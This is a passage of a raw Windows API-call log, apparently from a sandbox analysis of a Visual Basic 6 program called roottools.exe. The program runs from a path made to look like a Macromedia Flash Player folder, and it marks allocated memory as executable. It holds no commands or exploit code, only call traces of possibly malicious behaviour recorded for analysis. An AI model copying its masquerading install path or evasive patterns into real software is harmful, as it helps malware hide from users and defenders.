lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0083.721] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0083.721] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0083.721] lstrcpyA (in: lpString1=0x5417b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0083.721] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\ROAMING\\MACROMEDIA\\FLASH PLAYER\\MACROMEDIA.COM\\SUPPORT\\FLASHPLAYER\\SYS\\ROOTTOOLS.EXE") returned 111 [0083.722] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0083.722] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0083.722] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?ROAMING?MACROMEDIA?FLASH PLAYER?MACROMEDIA.COM?SUPPORT?FLASHPLAYER?SYS?ROOTTOOLS.EXE") returned 0x90 [0083.722] GetLastError () returned 0x0 [0083.723] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.723] OleInitialize (pvReserved=0x0) returned 0x0 [0083.729] OaBuildVersion () returned 0x321396 [0083.729] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x76b60000 [0083.729] GetLastError () returned 0x0 [0083.730] GetProcAddress (hModule=0x76b60000, lpProcName="OleLoadPictureEx") returned 0x76bc70a1 [0083.730] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc14a [0083.730] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0af [0083.730] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0083.730] RegisterClassA (lpWndClass=0x18fc34) returned 0xc196 [0083.730] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0083.730] RegisterClassA (lpWndClass=0x18fc34) returned 0xc197 [0083.731] GetUserDefaultLCID () returned 0x409 [0083.731] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0083.731] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x210000 [0083.732] VirtualAlloc (lpAddress=0x210000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.732] VirtualAlloc (lpAddress=0x210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.732] VirtualAlloc (lpAddress=0x210000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.732] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.733] VirtualAlloc (lpAddress=0x210000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.733] VirtualAlloc (lpAddress=0x210000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.733] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0083.733] GetCurrentProcess () returned 0xffffffff [0083.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0083.733] GlobalAddAtomA (lpString="VBDisabled") returned 0xc110 [0083.733] GetVersion () returned 0x1db10106 [0083.733] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76b60000 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="DispCallFunc") returned 0x76b73dcf [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="LoadTypeLibEx") returned 0x76b707b7 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="UnRegisterTypeLib") returned 0x76b91ca9 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="CreateTypeLib2") returned 0x76b78e70 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="VarDateFromUdate") returned 0x76b77684 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="VarUdateFromDate") returned 0x76b7cc98 [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="GetAltMonthNames") returned 0x76ba903a [0083.733] GetProcAddress (hModule=0x76b60000, lpProcName="VarNumFromParseNum") returned 0x76b76231 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarParseNumFromStr") returned 0x76b75fea [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromR4") returned 0x76b83f94 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromR8") returned 0x76b84e9e [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromDate") returned 0x76badb72 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromI4") returned 0x76b92a8c [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecFromCy") returned 0x76bad737 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarR4FromDec") returned 0x76bae015 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x76bacc3d [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="GetRecordInfoFromGuids") returned 0x76bad1c4 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayGetRecordInfo") returned 0x76bad48c [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArraySetRecordInfo") returned 0x76bad4c6 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayGetIID") returned 0x76bad509 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArraySetIID") returned 0x76b7e7bb [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayCopyData") returned 0x76b7e496 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x76b7ddf1 [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="SafeArrayCreateEx") returned 0x76bad53f [0083.734] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormat") returned 0x76bb2055 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatDateTime") returned 0x76bb20ea [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatNumber") returned 0x76bb2151 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatPercent") returned 0x76bb21f5 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarFormatCurrency") returned 0x76bb2288 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarWeekdayName") returned 0x76bb2335 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarMonthName") returned 0x76bb23d5 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarAdd") returned 0x76b85934 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarAnd") returned 0x76b85a98 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarCat") returned 0x76b859b4 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarDiv") returned 0x76bde405 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarEqv") returned 0x76bdef07 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarIdiv") returned 0x76bdf00a [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarImp") returned 0x76bdef47 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarMod") returned 0x76bdf15e [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarMul") returned 0x76bddbd4 [0083.735] GetProcAddress (hModule=0x76b60000, lpProcName="VarOr") returned 0x76bdecfa [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarPow") returned 0x76bdea66 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarSub") returned 0x76bdd332 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarXor") returned 0x76bdee2e [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarAbs") returned 0x76bdca11 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarFix") returned 0x76bdcc5f [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarInt") returned 0x76bdcde7 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarNeg") returned 0x76bdc802 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarNot") returned 0x76bdec66 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarRound") returned 0x76bdd155 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarCmp") returned 0x76b7b0dc [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecAdd") returned 0x76b95f3e [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecCmp") returned 0x76b84fd0 [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarBstrCat") returned 0x76b80d2c [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarCyMulI4") returned 0x76b959ed [0083.736] GetProcAddress (hModule=0x76b60000, lpProcName="VarBstrCmp") returned 0x76b6f8b8 [0083.736] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75450000 [0083.736] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstanceEx") returned 0x75499d4e [0083.737] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromProgIDEx") returned 0x75460782 [0083.737] GetSystemMetrics (nIndex=42) returned 0 [0083.737] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x755966bc) returned 0x0 [0083.737] IMalloc:Alloc (This=0x755966bc, cb=0x4) returned 0x5a9210 [0083.737] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0083.737] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg" [0083.737] SetLastError (dwErrCode=0x0) [0083.737] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0083.737] SetLastError (dwErrCode=0x2) [0083.737] GetLastError () returned 0x2 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="MTX") returned 1 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="DLLHOST") returned 1 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="INETINFO") returned 1 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="W3WP") returned -1 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="ASPNET_WP") returned 1 [0083.737] lstrcmpiA (lpString1="roottools", lpString2="DLLHST3G") returned 1 [0083.737] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0083.737] lstrcmpiA (lpString1="roottools", lpString2="IEXPLORE") returned 1 [0083.737] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74940000 [0083.738] GetLastError () returned 0x0 [0083.738] GetProcAddress (hModule=0x74940000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74987685 [0083.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0083.739] CoRegisterMessageFilter (in: lpMessageFilter=0x542054, lplpMessageFilter=0x54205c | out: lplpMessageFilter=0x54205c*=0x0) returned 0x0 [0083.739] IUnknown:AddRef (This=0x542054) returned 0x2 [0083.739] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0083.739] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x280175 [0083.739] GetModuleHandleA (lpModuleName="USER32") returned 0x75790000 [0083.739] GetProcAddress (hModule=0x75790000, lpProcName="GetSystemMetrics") returned 0x757a7d2f [0083.739] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromWindow") returned 0x757b3150 [0083.739] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromRect") returned 0x757ce7a0 [0083.740] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromPoint") returned 0x757b5281 [0083.740] GetProcAddress (hModule=0x75790000, lpProcName="EnumDisplayMonitors") returned 0x757b451a [0083.740] GetProcAddress (hModule=0x75790000, lpProcName="GetMonitorInfoA") returned 0x757b4413 [0083.740] GetSystemMetrics (nIndex=0) returned 1440 [0083.740] GetSystemMetrics (nIndex=78) returned 1440 [0083.740] GetSystemMetrics (nIndex=1) returned 900 [0083.740] GetSystemMetrics (nIndex=79) returned 900 [0083.740] GetSystemMetrics (nIndex=50) returned 16 [0083.740] GetSystemMetrics (nIndex=49) returned 16 [0083.740] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x330105 [0083.740] RegisterClassExA (param_1=0x18fe78) returned 0x8ec199 [0083.740] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40228 [0083.740] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0083.741] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0083.741] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0083.741] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.741] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.741] MonitorFromWindow (hwnd=0x40228, dwFlags=0x2) returned 0x10001 [0083.741] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0083.741] SetWindowPos (hWnd=0x40228, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0083.741] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0083.743] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0083.743] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0083.743] ShowWindow (hWnd=0x40228, nCmdShow=4) returned 0 [0083.743] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.743] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0083.744] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0083.744] GetWindowThreadProcessId (in: hWnd=0x40228, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x97c [0083.744] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.744] GetUserDefaultLCID () returned 0x409 [0083.744] IsValidCodePage (CodePage=0x3a4) returned 1 [0083.744] IsValidCodePage (CodePage=0x3b5) returned 1 [0083.744] IsValidCodePage (CodePage=0x3b6) returned 1 [0083.744] IsValidCodePage (CodePage=0x3a8) returned 1 [0083.746] GetUserDefaultLangID () returned 0x409 [0083.746] GetSystemDefaultLangID () returned 0x5a0409 [0083.746] GetSystemMetrics (nIndex=42) returned 0 [0083.746] IMalloc:Alloc (This=0x755966bc, cb=0xa8) returned 0x5ad988 [0083.746] IMalloc:GetSize (This=0x755966bc, pv=0x5ad988) returned 0xa8 [0083.746] IMalloc:Alloc (This=0x755966bc, cb=0xc) returned 0x5ad1e0 [0083.746] GetCurrentThreadId () returned 0x97c [0083.746] IMalloc:Alloc (This=0x755966bc, cb=0x3c) returned 0x5aa2a8 [0083.746] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x5a9a40 [0083.746] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0083.746] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x5a9a68 [0083.746] GetCurrentThreadId () returned 0x97c [0083.746] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x97c) returned 0x201e7 [0083.746] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0083.746] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c19a [0083.746] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40224 [0083.747] NtdllDefWindowProc_A (hWnd=0x40224, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0083.747] NtdllDefWindowProc_A (hWnd=0x40224, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0083.747] NtdllDefWindowProc_A (hWnd=0x40224, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0083.747] NtdllDefWindowProc_A (hWnd=0x40224, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.747] NtdllDefWindowProc_A (hWnd=0x40224, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.747] SetWindowLongA (hWnd=0x40224, nIndex=0, dwNewLong=5513372) returned 0 [0083.747] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0083.747] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0083.747] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0083.747] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0083.747] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0083.747] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0083.747] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0083.747] CreateCompatibleDC (hdc=0x0) returned 0x4010241 [0083.747] GetCurrentObject (hdc=0x4010241, type=0x7) returned 0x185000f [0083.747] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x40228, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40220 [0083.747] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0083.747] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0083.747] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0083.748] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.748] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.748] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x210, wParam=0x1, lParam=0x40220) returned 0x0 [0083.748] GetCurrentThreadId () returned 0x97c [0083.748] GetCurrentThreadId () returned 0x97c [0083.748] lstrlenA (lpString="VB") returned 2 [0083.748] lstrlenA (lpString="CommandButton") returned 13 [0083.749] lstrlenA (lpString="VB") returned 2 [0083.749] lstrlenA (lpString="Printer") returned 7 [0083.749] lstrlenA (lpString="VB") returned 2 [0083.749] lstrlenA (lpString="Form") returned 4 [0083.749] lstrlenA (lpString="VB") returned 2 [0083.749] lstrlenA (lpString="Screen") returned 6 [0083.749] lstrlenA (lpString="VB") returned 2 [0083.749] lstrlenA (lpString="Clipboard") returned 9 [0083.749] lstrlenA (lpString="VB") returned 2 [0083.749] lstrlenA (lpString="MDIForm") returned 7 [0083.750] lstrlenA (lpString="VB") returned 2 [0083.750] lstrlenA (lpString="App") returned 3 [0083.750] lstrlenA (lpString="VB") returned 2 [0083.750] lstrlenA (lpString="UserControl") returned 11 [0083.750] lstrlenA (lpString="VB") returned 2 [0083.750] lstrlenA (lpString="PropertyPage") returned 12 [0083.750] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0083.750] lstrlenA (lpString="VB") returned 2 [0083.750] lstrlenA (lpString="UserDocument") returned 12 [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.751] GetCurrentThreadId () returned 0x97c [0083.752] lstrlenA (lpString="VB") returned 2 [0083.752] lstrlenA (lpString="PictureBox") returned 10 [0083.752] lstrlenA (lpString="VB") returned 2 [0083.752] lstrlenA (lpString="Label") returned 5 [0083.752] lstrlenA (lpString="VB") returned 2 [0083.752] lstrlenA (lpString="TextBox") returned 7 [0083.753] lstrlenA (lpString="VB") returned 2 [0083.753] lstrlenA (lpString="Frame") returned 5 [0083.753] lstrlenA (lpString="VB") returned 2 [0083.753] lstrlenA (lpString="CheckBox") returned 8 [0083.753] lstrlenA (lpString="VB") returned 2 [0083.753] lstrlenA (lpString="OptionButton") returned 12 [0083.753] lstrlenA (lpString="VB") returned 2 [0083.753] lstrlenA (lpString="ComboBox") returned 8 [0083.754] lstrlenA (lpString="VB") returned 2 [0083.754] lstrlenA (lpString="ListBox") returned 7 [0083.754] lstrlenA (lpString="VB") returned 2 [0083.754] lstrlenA (lpString="HScrollBar") returned 10 [0083.754] lstrlenA (lpString="VB") returned 2 [0083.754] lstrlenA (lpString="VScrollBar") returned 10 [0083.754] lstrlenA (lpString="VB") returned 2 [0083.754] lstrlenA (lpString="Timer") returned 5 [0083.755] lstrlenA (lpString="VB") returned 2 [0083.755] lstrlenA (lpString="DriveListBox") returned 12 [0083.755] lstrlenA (lpString="VB") returned 2 [0083.755] lstrlenA (lpString="DirListBox") returned 10 [0083.755] lstrlenA (lpString="VB") returned 2 [0083.755] lstrlenA (lpString="FileListBox") returned 11 [0083.755] lstrlenA (lpString="VB") returned 2 [0083.755] lstrlenA (lpString="Menu") returned 4 [0083.756] lstrlenA (lpString="VB") returned 2 [0083.756] lstrlenA (lpString="Shape") returned 5 [0083.756] lstrlenA (lpString="VB") returned 2 [0083.756] lstrlenA (lpString="Line") returned 4 [0083.756] lstrlenA (lpString="VB") returned 2 [0083.756] lstrlenA (lpString="Image") returned 5 [0083.756] lstrlenA (lpString="VB") returned 2 [0083.756] lstrlenA (lpString="Data") returned 4 [0083.756] lstrlenA (lpString="VB") returned 2 [0083.756] lstrlenA (lpString="OLE") returned 3 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x5ada38 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x5adaa8 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x5adb18 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x5adb88 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x5adbf8 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0xc) returned 0x5ad1f8 [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x7c) returned 0x5adc68 [0083.757] IMalloc:GetSize (This=0x755966bc, pv=0x5adc68) returned 0x7c [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x20) returned 0x5a9c70 [0083.757] GetCurrentThreadId () returned 0x97c [0083.757] GetCurrentThreadId () returned 0x97c [0083.757] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x5a9c98 [0083.758] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0083.758] GetCurrentProcess () returned 0xffffffff [0083.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0083.758] VirtualAlloc (lpAddress=0x210000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.758] VirtualAlloc (lpAddress=0x210000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.758] VirtualAlloc (lpAddress=0x210000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.758] VirtualAlloc (lpAddress=0x210000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0083.758] VirtualProtect (in: lpAddress=0x210000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0083.758] GetCurrentProcess () returned 0xffffffff [0083.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0xa000) returned 1 [0083.758] GetCurrentThreadId () returned 0x97c [0083.763] SetWindowTextA (hWnd=0x40228, lpString="Ngtede") returned 1 [0083.763] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0083.764] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0083.764] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0083.764] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 